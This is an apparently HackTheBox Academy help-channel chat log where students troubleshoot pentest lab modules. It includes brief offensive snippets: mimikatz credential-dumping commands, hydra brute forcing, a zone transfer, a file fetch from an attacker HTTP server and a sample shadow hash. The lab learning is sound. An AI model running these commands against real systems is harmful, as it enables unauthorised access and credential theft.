#modules

Pretty sure that error just means the account can't use winrm

ahhh nevermind my question I solved it

please, i need a hint

I just needed to start an elevated shell in anyway i wanted to.

i think i get it, will try

That whole module is a direct walkthrough. That error, I think, is just saying the user isn't authorized to use WinRM.. that's it. Check the module it should walk you through it.

thanks

.

hello, i'm in Introduction to Active Directory,AD Administration: Guided Lab Part I. The instructions say to drill down into the directory but when i'm logged into the computer on AD, there are no folders. Am i missing something??

that's the wrong window. you want to open Active Directory Users and Computers

Should be “Users and Computers”

literally found it as you sent this lol, thank you

this look right?

try dsa.msc

I have a question…. Does all XXE resort to DTD? Is there any way of exploiting it with something other than Doctype?

ok now i got it, thank you

Most is DTD from what I read, but there are some that don't use DTD. Some XML parsers resolve external entities embedded in the XML directly. https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

Module: Attacking Web Applications with Ffuf
Section: Skills Assessment - Web Fuzzing
Link to section: https://academy.hackthebox.com/module/54/section/511

I've already completed this module, however, I'm just revisiting it to go through the skills assessment. The request rate seems to be quite slow. I've been having trouble since yesterday. Is it just me? The target is publicly accessible at 94.237.57.106:50556, so if you could try the same command and let me know I'd appreciate it. Thanks!

Fuzzing for subdomains with ffuf should be with the Host header and not directly in the url.

your command is wrong

recheck the module

Has anyone here embarked on the new Active Directory Pentest Path? If so, I could some help.

I'm in Active Directory BloodHound - Edges.

The instructions said to use PowerView to change Rosy's password using the Grace account.

I was able to successfully change the password, as instructed.

The instructions then said I can RDP to SRV01 using Rosy account.

I've used xfreerdp, Remmina, and rdesktop, but none of them work.

Any advice?

They asked to fuzz for subdomain and vhosts. I know one of the answers come from this command as when I ran it last night, I got one of the answers. @limber river

Also, I'm facing the low request rate issue even when I specify the host header.

you can use threads to make it faster

My mistake, I was wrong, apparently the command I'd run last night was vHost fuzzing and not Sub-domain

It's suddenly fast enough without having to forcefully increase the threads or request rate, must've been some network issue yesterday. Thanks!

Hi, I want purchase a subscription to learn secure code..but before that I need to confirm...is hackthebox will have the option to see the source code for each box and module?

No

Some modules have a source code and stuff, but you won't get the exact setup of the lab

Got it ... Thanks a lot.

hi everyone! Is there anyone using academy htb? is it only me or anyone else getting 404 error for API attack modules ip address?

Have you tried adding the bit from your section to the url?

Hey guys! I was troubleshooting with ricky earlier but things remain the same for the bruteforcing module. On the website section as well as the skill assessment 2 question there is just no way for me to ssh to the boxes. Direct connection from host machine or pwnbox wont work. Keep getting ‘Host key verification failed’

Tried resetting the target, used different pc, used pwnbox, set thet specified port. Nothing works.

Sorry I didn't fully understand your question

Did you mean http:// ? yes I tried

You’re connecting to the IP with the port. But in the section they talk about the IP + port + slug
Example
http://94.237.59.63:31874/api/v1/authentication/customers/sign-in

ooh let me try

@storm elk do you have any insight on this? 🙏🏽

Worked thanks! I was supposed to add /swagger which I didn't know lol

Ahhh!

Let me see what I can do

Thx a bunch 🫶🏻

Is that that the login brute forcing module?

Correct!

Maybe ssh from the host is not what you’re supposed t do for Q2

hello wondering if anyone can give me a hint on this one. Working on Windows Privilege Escalation > Weak Permissions : Escalate privileges on the target host using the techniques demonstrated in this section. Submit the contents of the flag in the WeakPerms folder on the Administrator Desktop.

But thats what it says on the website section. Is it not?

What is the section name exactly

I've used rdp to get connected to the desktop - my next step is to log into the administrator desktop correct?

Dm me what you’ve tried and I’ll check it out when I’m on my pc. Is this for the web services section?

Yes, that section, I’ll dm you

Thanks. I’ll be at my pc in about 90 min

this is probably because you respawned the target which changes the SSH key, and you have it saved in ~./ssh/known_hosts, you can delete the key in there

or i think you can try ssh -o StrictHostKeyChecking=no user@<ip>

What PDF are you talking about? Are there any mention on the module Credential Hunting in Windows to read some PDF file?

Footprinting (SMB) How do we know it was a linux machine(refering to last question). Hint said linux doesnt have c:\ drive what was the sign or something to tell its linux machine not windows (Thanks in adv.)

sorry, do you need help with the question or just wondering how to tell if it's windows or linux?

How do you access the All Users directory? I can't find such a thing

Aside from powershell history when using findstr command, can't find any leads to answer Q4 and Q5 of Credential Hunting in Windows. Any tips?

$ if ur shell is a user, # if root?

.. c:/ is win, simple hint:D

I'm questioning if I should continue to pursue ethical hacking or cybersecurity as a career path

It is overwhelmingly hard

I'm also wondering if AI won't soon take over this field

They already have some AI models that can find 0 day exploits

windows priv esc skill assessment 1
i found valid clsid but still get COM -> recv failed with error: 10038

Why not be the person using the AI?

when i test the clsid it works but executing the command it gives the error again

In CPTS Password Attacks Module, Protected Archives section.

The practice question is to crack a zip file called Notes.zip
But when I run john it just quits and does nothing

glitch@debian:~/practice$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Note: Passwords longer than 21 [worst case UTF-8] to 63 [ASCII] rejected
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
0g 0:00:00:00 DONE (2024-11-21 11:39) 0g/s 23513Kp/s 23513Kc/s 23513KC/s (79knock)..*7¡Vamos!
Session completed.

It's even a fresh install because the last one gave me some issues where john wasn't able to identify some hash types.
in this one it does identify the hash type clearly because it displays Loaded 1 password hash (PKZIP [32/64])
But why doesn't it crack it?

If you look up at the top of the page, at right you have resource boton, they give you a list of possible users and passwords

tried it, same problem

I even wrote my own python script to crack it and used it with both lists and it did not work 😲

I created my own encrypted zip file and use my script on it and it worked.

the problem must be in the zip file itself.

Meaby you have to mutate the dictionary first, but you allready got it, also i recommend to specify the mode, just in case

I tried mutation too lol

I'm examining my python code to make sure it works before I blame the zip lol.
It worked on my zip file but with my own wordlist which contains the password and is short.
I'm now testing it with rockyou.txt as my file as ASCII format while rockyou is UTF-8 so maybe I have to do some modifications on it.

I'll see if specifying the mode in john makes any difference

but how to do that lol? never had to specify any modes to john

there's no mode flag

thanks @deft lily

couldnt @ moderator

also i put in the verify command and get blocked

There's a role for it to ping any mod/admin (Serious rule break)

Let's continue the verification talk in #bot-commands

O yeah my bad, i thougt you use hashcat

I think they also use the fasttrack dicctionary at /usr/wordlists

But i dont remember exactly

Hello y'all good hackers?

I figured it out, I was opening the file with utf-8 encoding, then I was encoding it again when providing it to the zip library lol.

I don't know how it worked for my zip file but not for the provided one.
I fixed that and used the mutated list and it worked, no john needed

Hello. Please read #welcome

Hey guys any tip regaring Attacking Enterprise networks - Web Enumeration Exploitation on this question?

I found the XSS vulnerability

I

NEED HELP

ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain ```

i cannot find any useful solution online

#modules message

it says uknown variable

it worked with --disable-ssl

thank you i found solution in this thread !

awesome 🙂

i have the following situation:

1- i have openVPN running with ip 10.10.14.117.
2- running a kali VM with NAT mode.
3- performed rdp connection to a windows machine.
4- created a simple python server inside Kali using python -m http-server --bind 0.0.0.0 to allow connections on all interfaces (port 8000 by default).

issue: i can ping my openVPN IP address from within the windows machine using ping 10.10.14.117. but i can't access the python simple server using 10.10.14.117:8000.

what i'm i understanding wrong about networks here?

is there a firewall in place preventing outgoing connections to high/suspicious ports?

my standard "python3 -m http.server 8080" with "iwr -uri http://10.10.10.10:8080/file.txt -outfile file.txt" works usually

do you mean creating an outbound rule and specify a range of port? e.g. 10000-60000?

ah ur asking if there is a rule preventing connections

I'm not sure in which environment you are testing but there are for example prolabs that have a firewall implemented that doesn't allow connecting to suspicious ports, so your ping may reach your host but not a connection on port 8000, but 80 would work for example

i thought u are asking a question

nope the lab here is a simple file transfer module lab, where i do rdp connection and transfer files between host and target machines

so i'm sure there are no fire walls or something

hm okay, not sure why that wouldn't work then, thats a standard case that I use all the time

I dont use the --bind parameter (because it binds on 0.0.0.0 by default I think) but beyond that we do the same thign

correct i didn't use it either, i said it here just in case someone says to use it although it is not necessary

to be sure, the browser is supposed to work on the labs right? because i tried to access the server via the firefox browser on the windows target

yea that should work too, or you can try via powershell with the command I posted above

didn't work either iwr : Unable to connect to the remote server

i run openVPN on my windows host (outside the kali VM), i also run the lab on windows host, but there was never an issue with accessing to a lab from within kali VM this way.. could it cause issues on reverse connections like in this case??

Hi guys, I have a question. A few months ago I bought the academy's $500 silver membership.

I'm afraid I won't be able to finish all the modules in time, and I don't want to buy the subscription again.

if I sign up for all the modules, without completing them. Once my subscription expires, will I be able to access those modules?

You only maintain access to modules you complete 100% under the annual plan

Modules you unlock via cubes are yours in perpetuity

Anyone here done with Introduction to Sliver C2? Module: Probing the Surface

I've done that part

Can I dm you sir?

I think you can also just message here, no?

aight, just a quick Q, you've done SQL injection to identify the db user?

I tried it that way but couldn't get the answer they wanted. I ended up analyzing the web app on the disk to identify which user they use for the database interactions

ahh I see, thanks!

7Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

What's the question

Here

Thanks. This is the command I'm using:
gobuster vhost -u http://94.237.59.180:45571 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 --append-domain
Are you saying I should also add a --domain inlanefreight.htb flag to it?

iirc u have to use mimikatz on first machine to extract creds

This my memory

Use the hash

Hello I m strugling with Pen test wifi module final assesment question 3.Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.

I m not ableto connect there I have name of network and pass too but I m not able to connect through GUI or even through CLI ...do ya have any sugestions please??

remember that some security mechanism could be in place, change your mac

Hello, Im currently stuck on the Information Web Gathering Edition module for DNS Zone Transfers and when attepting to preform a zone transfer as stated in the module, i.e. "dig axfr @ns1.inlanefreight.com inlanefreight.htb" OR "dig axfr @ns1.inlanefreight.com inlanefreight.com". It returns that no servers oculd be found and the connection refused. I did try it with those servers IPs which also didn't work, tried exploring forums and doing some self reserach online and cannot seem to find a helpful step in the right way for this module

Check again whether it really says com and not htb.

It does say htb, although when preforming a dig on the inlanefreight.htb it wont return any valid results, even with the A parameter for IPv4

Remember that htb is not an official TLD. You must use the IP address of the target as the nameserver

Oh okay, I had an oversight there with the phrasing of that question, thank you

@everyone hello yall just got mass pinged lol

lol

Nope 😉
You have no power to do this

Good Morning guys, hope yall having a wonderful day i just start learning and i reach Learning Progress in the Learning process module final question is kinda piss me off cuz i answered and i said incorrect answer its about What is the difference between the two numbers of the learning progress mentioned above and i did answer it everytime said my answer is wrong

my answer was : The difference between the two numbers, ( 1.00 ) 365 = 1.00 (1.00) 365 =1.00 and ( 1.01 ) 365 = 37.7 (1.01) 365 =37.7, highlights the power of consistent, incremental improvement over time.

one important thing to know about the answers to the questions in the modules is that they need to be an exact match to what is expected. You can already see how your answer could be written in many different ways. So probably not what the author is looking for. You're vastly overthinking this

do you have any example of the answer for this module ?

check the hint

it said 37.7 - 1.00

which is ?

gotta lock in

37.7 - 1.0 = 36.7 ?

i tried couple of options still said my answer is wrong

I can imagine you being even more pissed off that that was the question and answer, wouldn't blame you. I guess the author just needed something to give the cubes back to you, and indeed in such a module it's hard to come up with something with an exact answer

what did you try ?

Breakdown: ( 1.00 ) 365 = 1.00 (1.00) 365 =1.00: This represents no change or progress. Multiplying the same value (1.00) every day for 365 days results in no growth. ( 1.01 ) 365 = 37.7 (1.01) 365 =37.7: By improving by just 1% (0.01) each day, the cumulative effect over 365 days leads to a 37.7-fold increase. this the first one that i tried

the second one was this : The difference between the two numbers,
The difference between the two numbers, ( 1.00 ) 365 = 1.00 (1.00) 365 =1.00 and ( 1.01 ) 365 = 37.7 (1.01) 365 =37.7, highlights the power of consistent, incremental improvement over time.

I didn't make myself clear. The answer boxes in HTB Academy will look for an exact match to the answer. So if the recorded answer is "abc" and you reply anything other than "abc", it will be marked incorrect

that's the thing dude, there will be a million way to answer and still as you said the answer is already recorded

Reload the Page and try again

there will be a million ways to write what you are writing above, yes. Which should be a clue towards the fact that you're overthinking this

the person who was responsible for this question he wasn't clear on how we can asnwer the question

Lets remove context. What is the difference between 5 and 2 ?

i'm not overthinking i guess i will enroll in a different module

ok

5 is bigger than 2

thank you so much for the help anyway i will probably skip it for now

"difference" is the mathematical term for the result of subtraction. so the difference between 5 and 2 is 3

Have you tried this solution?

i will try it

Is this the right wordlist to use against the hash of Notes.zip file "/usr/share/john/password.lst"? Also how long does it take to finish?

From which module?

credential hunting in linux

basically the answer was : 36.7

5 is not 2

the problem was how you can answer the question adding only numbers not letters to the answer

This one?
https://academy.hackthebox.com/module/51/section/474

No. This one https://academy.hackthebox.com/module/147/section/1320

For this reason, please ALWAYS specify the module name and the section. 😉

A tool is mentioned in the module. Use this tool to get the password you are looking for.

Yes but the wordlist provided is for usernames and passwords.

As of now, its been an hour and jtr using this wordlist "/usr/share/john/password.lst" is still on the process of cracking the hash of the file.

Is the wordlist that I'm using the correct one?

You don't have to touch this file at all. You need the tool mentioned in the module

By the way, you will be provided with a list in this module. It will be mutated at some point. In most cases, one of these lists is the correct list. But in this case, you don't need any of the lists.

hi guys i have just started the shels and payloads modulu i am now on the reverse shell section but the target wont spawn and reccomendations on what to do ?

never mind i spawned it for a 4th time now and it spawned

Was able to crack it. Jesus christ the content was useless

I see. Alright. Yeah that was pretty confusing to use the mut pass for the hash of the file.

Guys, which tier 3 offensive module would you recommend? I’ve accumulated 500.

I was able to transfer logins.json to pwnbox. But it seems like lazagne.exe cant be run on pwnbox or am I wrong?

hi guys, i have a question. What component of a report should be written in a simple to understand and non-technical manner?

The target is a Linux server, right? Linux cannot execute exe files

All of them 😉

You mean the pwnbox? Yes it is linux. So thats why I can't run lazagne.exe on pwnbox.

No, the Target Machine

ill try the .py version and run it on pwnbox

why on the pwnbox?

Do you want to hack yourself?

PwnBox is your Machine

because I only have SSH connection against the target machine/IP. From that SSH Conn, I transfered the folder .mozilla to Pwnbox.

wdym, should I run the lazagne on ssh connection?

Transfer your Tool to the Target and run it there

on ssh session? Ok.

I thought I needed to establish full fledged shell to execute/run executables against the target.

If you log in with SSH, you have a shell.

So based on this information, is it also possible to run executables on the target even if you're on SMB or FTP session?

You are logging in to the target via SSH, right?

Yes im just asking

is it or it depends?

Then why FTP or SMB?

You may be able to execute commands via SMB
https://www.netexec.wiki/smb-protocol/command-execution/execute-remote-command

okay

But that has nothing to do with the module.

let me just try your suggestion first

Hi, has anyone done the HtB academy windows lateral movement module. I'm stuck on the skills assessment? Thanks in advance

error both on lazagne.py and firefox_decrypt.py

tried running it on ssh session against the target

Does anyone know what type of encryption exactly the encrypted credentials in firefox saved passwords use? I know its AES but there's a lot of AES modules for hashcat.

since I already have logins.json and can see that actual encrypted credentials, maybe I can just crack it using hashcat?

Hello everyone, in the Windows Privilege Escalation Skills Assessment (Pt. 1) I’m able to get initial foothold, but am STRUUUUGGGLING to get priv esc. I’ve tried PrintSpoofer, and tried JuicyPotato with MULTIPLE CLSIDs but keep getting the 10038 error. Even tried the GetCLSID.ps1 script to find some on the machine….to no avail. Could someone point me in the right direction?

hi im currently trying to da reverse shell in pwn box via a windows rdp that i connectin pwnbox but the rdp windows target cannot send traffic to my pwnbox maybe i have the wrong ip but i did ip -a to find out my pwnboxes local ip but it dosent seam to work any help maybe ? im new to this thanks : )

thr module is shells and payloads

Im join my friend

You have to upload the complete package, not just the executable file

I see.. thank you so much

ok i figured it out so the problem was that i want typing in the vpn ip but the local ip rookie mistake

https://tenor.com/view/lasagna-garfield-pasta-yummy-delicious-gif-17886507

Not only Garfield likes Lazagne 😉

Hey everyone.

Need some help. I'm stuck on the Linux Priv esc, logrotate module.

What exactly is not working?

Hi, could anybody help me with Skill Assessment in Advanced Deserialization Attacks? I've got SecureAuth.DevToken and try to use gadget for JSON.Net. Am I on the right way? I cant use ObjectDataProvider as it is forbidden, it seems. Another gadgets from yoserial-c# didn't help me

https://academy.hackthebox.com/module/163/section/1549 im having issues with this

i really have no idea why this isnt working

but its a common thing after some research

I'm pretty sure you need to import PowerView.

Ah, I missed that. I only saw PowerSploit and Recon

idk why but pv wont import properly

everything else will

You using the latest PowerView?

yes sir

the only one i can download is 3.0.0

Try this:
https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1

that worked i love you

Hi ! Good day!

Can you help me please? I'm in HTB DACLs I module, I'm in Password Abuse section, I'm stuck on the last part, abusing Marcos' account to get the gMSA of the htb-svc$ account to get the contents of the flag.txt file, I already have the hash of the htb account, I tried to connect with pth-winexe, with psexec, winrm, crackmapexec, and others, but it refuses the connection, then I try to do pth with mimikatz but to run it I need to access as administrator, but I don't have those credentials. What should I do to get that flag, or what am I doing wrong? Thanks for your help.

hey do i have to worry about my vm crashing when i'm using john or a similar password cracker? i think i dedicated 4 gb of ram and 4 processors to the vm

Hey in the introduction to windows evasion static analysis section i dont see a a C/tools directory to safely put the payload i want to encrytp and all anyone any help ?

are you sure that you are on the correct VM (Evasion-Dev)?

Ah they gave me a ip i rdp'd into that

It should be able crack most passwords fast enough in the modules

if I remember correctly, the Evasion-Dev-VM is only accessible from the very first section. All other sections should spawn the target.

Oh i see

It’s good to have hashcat or John on your host too

But we need to attack the target with the tools right

yes

So if there are differnt targets like each taget should contain a tools folder right

Since we need an tools folder that isnt check by defender to initialy put our malicious code and compiler it right

None of the targets have a tools folder.
You develop on the Evasion-Dev and then transfer them over to the target.

Oh that wasnt mentiomed there

It's in the Introduction

firefox encrypted data?

i dont think we have anything in hashcat for that right now

but if you have some example data we could potentially add it if its something that we can work on

that said, i think most of that browser data is encryped via DPAPI

or in the case of some of the sqlitedbs, i think it's sqlcipher with a few different ways for it to be keyed

htb academy not giving me a mark as complete option refreshed and everything still not appearing?

nvm im autistic i didnt enter the question answer

Hey guys any tip regaring Attacking Enterprise networks - Web Enumeration Exploitation on this question?

I found an XSS vulnerability and tried to some paylaods.. and reverse shells or get files but no luck.. Any tip ?

It says idor

So I am doing the wifi pentesting academy module and I have finished pretty much every part, but I can't figure out how to connect to the wifi network. I've found the SSID and the necessary password, and I have tried connecting over the terminal as well. I made sure to use the correct configuration (WPA2) but no matter what I do I keep getting the same error. Does anyone have a solution this, or any hints from someone who has completed this module? I'm not sure if i;m the only one whos encountered this problem.

So does anyone know the reason (If there is one) some people get this output when trying to use SMBmap?

$ smbmap -H 10.129.167.7 -v    

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 0 authenticated session(s)                                                          
[+] 10.129.167.7     is running Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX)
[*] Closed 1 connections      

Can you help me please? I'm in HTB DACLs I module, I'm in Password Abuse section, I'm stuck on the last part, abusing Marcos' account to get the gMSA of the htb-svc$ account to get the contents of the flag.txt file, I already have the hash of the htb account, I tried to connect with pth-winexe, with psexec, winrm, crackmapexec, and others, but it refuses the connection, then I try to do pth with mimikatz but to run it I need to access as administrator, but I don't have those credentials. What should I do to get that flag, or what am I doing wrong? Thanks for your help.

Module: SQL injection fundamentals
Part: assesment
I have question about initial Access. I dont know what to do, I discovered union injection but that brings me nowhere. Its output isn't readable and have no idea where could i write/read from

is it just impossible to use -A and -D RND:5 together in nmap ? im tryna use it on the lab and it just fails when i try to use them both

I don't see why the two would be incompatible, but maybe you're just stressing the connection. Maybe try toning things back with a -T2?

Both options generate some serious traffic.

SO

I JUST FINISHED IT

this means that i can cancel the sub and i still get access to it and any changes made correct

yes, that's what they say.

it seems too ood to be true

Yea I wondered if that includes lab access as well. I imagine it does, but that's the only part that seems like a great deal.

Once you've learned the content though I can't imagine someone revisiting the labs regularly enough to cost too much on their side.

exactly i will have to go over some stuff a few times as well

hey so try and focus the most on finding the path to write the shell to, remember that the goal here isnt to read information from databases, look for a way to get the shell, its shown in the previous sections

Okay, thanks!

youre welcome!

I mean its prob the same as you buy it

As in the content doesn't change all that often? Right, that's what I'm thinking. It doesn't cost them anything to allow access to the reading material. People spinning up resources could cost them, but you only get so much out of the labs at a certain point.

there were two updates to BF logins

Hi, I am a beginner to the HTB and i just started the Module SOC. trying to do a SOC module and In a question it says "navigate to http://[Target IP]:5601, " How do i navigate to it ? The instruction are not clear, Pasting in web browser does not work. How do i do complete this task ? ⁠

you will have to connect to the VPN and spawn the target

Anyone? Still stuck on this hours later 😅

hi I am stuck on question 3 of pass the hash section on password attacks module. I've gotten David's login info and NTLM hash but its not letting me authenticate with him.

in the spoiler I posted evidence that I did in fact do this

sudo ncat -nv --source-port 53 10.129.87.1 50000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Address already in use (98)
Ncat: TIMEOUT.

why do i get this error firewall evasion lab nmap - hard

so that's not David's password on dc01 and the hash is clearly not the right hash

so I'm confused

because when I enter the hash in question 3 it shows it is the wrong answer

sorted this

What is question 3?

Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account?

so that hash should be the right hash

do I need to use Invoke-TheHash?

because that's not working either

Can you try lsadump::dcsync?

I believe that’s what I usually use

mimikatz # lsadump::dcsync
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
ERROR kuhl_m_lsadump_dcsync ; Missing user or guid argument```

do I need to switch it to local?

I tried it

I tried a few variations on that

Use the user your using

ok

mimikatz # lsadump::dcsync /user:Administrator
[DC] 'inlanefreight.htb' will be the domain
[DC] 'DC01.inlanefreight.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)```

does same thing

its weird I thought I had it

what am I doing wrong?

Did you do privilege::debug already? Not sure if it’s going to make a difference

I don’t have notes on this module

makes no difference

Ohh wait

Try sekurlsa::logonpasswords

this worked I think hold on

yay it worked

I dont remember, but meaby you have to dump the pass sam or cache

With your first command I was fixated on lsadump::

Glad you got it now

Noice

i will say this. The AEN is fun. i couldnt get thru it by myself so im gonna go back after a few months and try again. but like man. AEN really was fun

Cube sale blackfriday 🙏 pls

What mod 3 y recommend

Idk if this is the right place to ask this but im new here so hi:)) ive created an account using my university email and i was wondering if i can still access the material presented in the modules (following a job path rn) after the email will not be available anymore or when i will stop the student subscription. Any ideas? Cause otherwise i would like to make some notes since the material is really cool :))

Hello everyone, in the Windows Privilege Escalation Skills Assessment (Pt. 1) I’m able to get initial foothold, but am STRUUUUGGGLING to get priv esc. I’ve tried PrintSpoofer, and tried JuicyPotato with MULTIPLE CLSIDs but keep getting the 10038 error. Even tried the GetCLSID.ps1 script to find some on the machine….to no avail. Could someone point me in the right direction?

how do this is also for pass the hash section of password attacks module

I can't RDP in as mark

do I need to use david's hash to log in via pass the hash into dc01 too?

I can't RDP in as julio either

this is for question 4 of the module

now I have David's hash

do I not need to do it from within Windows?

Maybe try and PTH with David's hash to launch a cmd prompt?

I know but do I try to get a reverse shell?

do I do it from Linux box?

What’s the question

I mean a session would prolly work.

ok so I can do it from Linux box

Don't overcomplicate it.

ok

The tools are provided in C:\tools, so I would keep running things from there, otherwise you would need to setup a pivot to reach the 172 network.

ok wait

I would review this part of the section Pass the Hash with Mimikatz (Windows)

I am

Well maybe try a different tool.

hold on I'm logged in as julio

ok I'm not able to log in as julio either

just opens powershell. will try more soon this coffee shop is closing

hello,

I'm doing the hacking wordpress module and up to enumerating for plugins with wpscan, however I don't have an api key and it seems it won't do plugins without it?

https://wpscan.com/ you sign up here and create an account, you'll get an API key that's good for 25 requests per day on the free plan.

Kinda stink that the module requires creating an account with a third party service to complete it

pretty sure you can still do it without that if you know how, but wpscan is an amazing tool that you'd want to sign up for anyway.

@quasi wave please do not spoil content, you can ask your question without revealing info like that

anyone done the cicada machine?

need help on where to start

try #boxes

what channel is that? it says i have no access

read #welcome and #rules to gain access

got it thanks

Hi. I'm working on Footprinting. I've got an issue when I'm finishing the Footprinting Lab - Medium level. Here's what I've done so far

• Found ||*sa * credentials in the alex's directory||
• Log into the MSSQL server management using ||both found password and the default password||
• It seems that I couldn't be able to log into the MSSQL server management
  Is there any steps or hints that I could be missed so far? thanks in advance

looks like target ACADEMY-ATTCOMSVC-LIN
@ https://academy.hackthebox.com/module/116/section/1165
it's not spawning with the ftp service needed for the task.

Spawned for me. Try doing CTRL+SHIFT+R and spawning it again.

Maybe try another user on the machine

You mean try another user aside of ||sa and alex||? Because I've tried with that user and the error still persists

it did at 3rd reset 😅

maybe log in another way

Aight, lemme try for another way, thanks

ok so hydra for some reason just is not working with rdp

i accidentally found the correct credentials with metasploit and when i use them individually it works fine but when i use the provided username and password wordlists i watch it try the correct credentials in real time and then tell me they're not valid

what command are you using

hydra -L username.list -P password.list rdp://[target ip]

crackmapexec fails entirely for some reason and i'm about to see if medusa works

i'm just reading the docs because i have no idea how to actually use it yet

hydra works for me so idk, maybe a different version

make sure its up to date

nope did not work

maybe try crowbar too, great fast tool

make sure the password and username are actually in those lists

should work

i used hydra for ssh earlier in the module and it worked fine

why does the host end in .1

what is the target you're attacking

10.129.62.1

that's the spawned target ip?

yep

doesn't work after resetting the target either

that ip doesn't seem right .1 is usually the gateway

if you included the module and section it would help immensly, all i can say is that it worked for me

password attacks - network services

it's clearly not an issue with the target IP because it works when i just give it the credentials

and i cracked the passwords for winrm, ssh, and smb just fine

no i mean, they don't spawn ending in .1 that i've seen. that's generally a reserverd IP for the gateway for the vlan.

oh yeah i agree but i don't think that's the issue

do you have that target spawned right now that ends in .1?

i'm currently resetting the target

my guess is you missed the last character or something

i was copy and pasting directly from hackthebox

and again it worked just fine with the same ip with three other network protocols

yeah but it's not a valid ip

i know but that doesn't explain why only hydra wasn't working on only rdp only under those specific conditions

how to tell if it's windows or linux coz after enumerating i got C:\ drive but hint pointed towards it was linux and i m confused lol

you clearly missed my question haha

yeah i'm getting the same thing as you. if i just put the name and password only in the list it works, if i just put the name in the username list and leave the password list it fails.

yep same here

okay good to know it's not a me issue

i have notes showing hydra worked before, so maybe something changed with the box. might want to report in #1234357888114364508

will do

interestingly crowbar isn't working either but the metasploit smb_login module accidentally found the credentials for rdp

my notes show hydra so i think i used crowbar for ssh bruting

never mind i got the subnet wrong

ok, thx

what the fuck

ok so i'm running a hydra scan that's projected to take 8 hours at maximum speed but the machines have a maximum uptime of 6 hours. what do i do

Footprinting (SMB) How do we know it was a linux machine(refering to last question). Hint said linux doesnt have c:\ drive what was the sign or something to tell its linux machine not windows. how to tell if it's windows or linux coz after enumerating i got C:\ drive but hint pointed towards it was linux and i m confused lol

The most I’ve waited in a module was 45-50 mins

Shouldn’t take that long

as in it shouldn't be taking 8 hours or it's normal for it to say it's going to take 8 hours and then take significantly less time than that

It shouldn’t take more than an hour to get the answer

alright i'll try again tomorrow

In footprinting lab - hard skill assessment, why the snmpv3 port can be accessed with community string? (Ive scanned the version of snmp port and it said snmpv3). I need explanation

I mean why the snmpv3 port can be accessed with snmpwalk v2c?

Nmap can report incorrect info

Owwhhh. I just found out about that, thank you sm.

Module: https://academy.hackthebox.com/module/147/section/1319
Question: On shadow file and opasswd file, is the salt embedded on the hash itself or not? Becase on the module, the command did not provided the salt at all when cracking the hash of shadow and opasswd

If there's no salt, it's not required

But it would be embedded in the hash

cry0l1t3:1000:2:$1$HjFAfYTG$qNDkF0zJ3v8ylCOrKB0kt0,$1$kcUjWZJX$E9uMSmiQeRh4pAAgzuvkq1
This is the salt right? $HjFAfYTG

Why do you care about the salt?

Because I want to know if I do need the salt when cracking a hash that has a salt.

Also it's asking for the root user, not cry0l1t3

How are you gonna crack a password without the salt?

its not about the who the user is. Do I need to specify the salt in hashcat or its embedded already on the hash itself?

.

alright

Also the hash wouldn't start with $

$ is just a delimiter

yeah noted on this one

Rule 1: don't overthink

If it doesn't tell you you need xyz extra thing then don't concern yourself with it

Like ordering a burger and saying you also want the ingredients that are already part of a burger

As much as I dont want to. There must be some variations on the exam meaning there will be more than one path to take in order for you to gain something. Yes for CTFs thats the way but on the exam and real world I think that is not the case.

But I want to know what makes a burger a burger to the most littlest detail 😆

Hello guys regarding Wi-Fi Penetration Testing Basics - Skills Assessment module last question: Connect to the WiFi network and submit the flag found at IP 192.168.1.1 or 192.168.2.1.
HOW 😄
I ve done ping, curl and nothing

try wget

hmm gonna 😄

It comes pre-made, you don't need to put it together

If you want a dive, look at the example hashes on hashcat wiki

Hi ! Can someone help me
I am in API attack module's Broken Object Property Level Authorization section.
Module said nothing about Product ID how I am supposed to finish second question of fifth section?

Hint says to focus 2 endpoint. Using first endpoint I've created customer order, but to use second order I need Product ID and I can not find it

hello can anyone help me in Attacking Wi-Fi Protected Setup - Skills Assessment What is the WPS PIN for the WiFi network named HackTheBox-Corp? i try all the possible attack and not working

Why is it whenever I transfer a shadow.bak file to pwnbox it has no filename or a blackout filename?

Is it due to file protection system on the target machine? Or its about the way how I transfer sensitive files?

Why is it that any .bak file I created on pwnbox has blacked out filename?

even on ls -la the .bak file I create is blacked out

how can I use unshadow if every .bak file on pwnbox has blacked out filename?

nvm.. was able to fix it by changing permissions

post your question

is rockyou the right wordlist when cracking unshadowed.hashes?

